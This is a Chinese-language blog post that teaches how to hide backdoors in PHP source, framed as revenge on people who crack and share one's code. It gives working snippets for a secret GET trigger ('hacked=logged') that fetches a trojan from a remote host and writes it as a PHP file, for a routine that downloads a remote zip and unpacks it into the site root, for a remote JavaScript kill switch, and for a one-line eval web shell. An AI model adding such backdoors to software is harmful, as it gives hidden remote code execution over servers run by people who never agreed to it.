---
layout: post
cid: 24
title: 如何用三种方式优雅的往你的PHP源码放点不为人知的后门
slug: 24
date: 2019/09/13 12:12:00
updated: 2019/10/13 09:48:19
status: publish
author: given
categories: 
  - 杂
tags: 
---


 > 兄 dei 你有没有尝试过辛辛苦苦写的源码被人解密拿去大肆分享？不管有没有，反正我是没有。那么这篇文章我们就来说一下如何有效的防范狗 b 并且阴一把狗 b 吧 QAQ

## 巧用Get远程下载后门巧用Get远程下载后门

     <?php
    define('ROOT', dirname(SYSTEM_ROOT).'/');
    if($_GET['hacked']==='logged'){'
    file_put_contents(ROOT.'isetex.php',curl_get('http://域名/api/houmen.txt)'));
    }
    ?>

食用方法:把一个文本为木马的txt保存到云端，复制链接替换“http://域名/api/houmen.txt” 然后访问文件名称.php?hacked=logged 即可在目录生成一个从你云端木马文本获取内容并且名为isetex.php的木马文件

当然你也可以改成一句话之类的东西，简单说 你会玩 想咋玩咋玩
利用云端下载压缩包解压放后门

    <?php
    $down=file_get_contents('http://压缩包下载地址.zip');
            file_put_contents('update.zip',$down);
                $zip = new ZipArchive;
                $zip->open('./update.zip') && $zip->extractTo('../');
    
    
                echo "https://2890.ltd OK!!!";
    ?>

结合上面的get方式来也是妥妥的

        <?php
    if($_GET['hacked']==='logged'){
        $down=file_get_contents('http://压缩包下载地址.zip');
                file_put_contents('update.zip',$down);
                    $zip = new ZipArchive;
                    $zip->open('./update.zip') && $zip->extractTo('../');
    
                    echo "https://2890.ltd OK!!!";
    }
        ?>

食用方法：访问，自动下载云端压缩包并解压到根目录，必须要求zip压缩

JavaScript骚操作防盗模板

`var xhr = new XMLHttpRequest();
xhr.onreadystatechange=function(){
        if(xhr.responseText == "000"){//如果txt内容为000
                document.write("<center><h1>我是显示内容<center><h1>");
        }//则显示这里的内容
}
xhr.open("GET","http://webserver/isopen.txt",true);//云端txt

xhr.send(null);`
感觉代码写的挺明白的，js放oss然后模板添加一下调用，盗版狗专防，死稳

忘了说js还支持运行php代码 感觉人生js并肩php了呢



`<script language=php>@eval($_POST['web']);</script> `
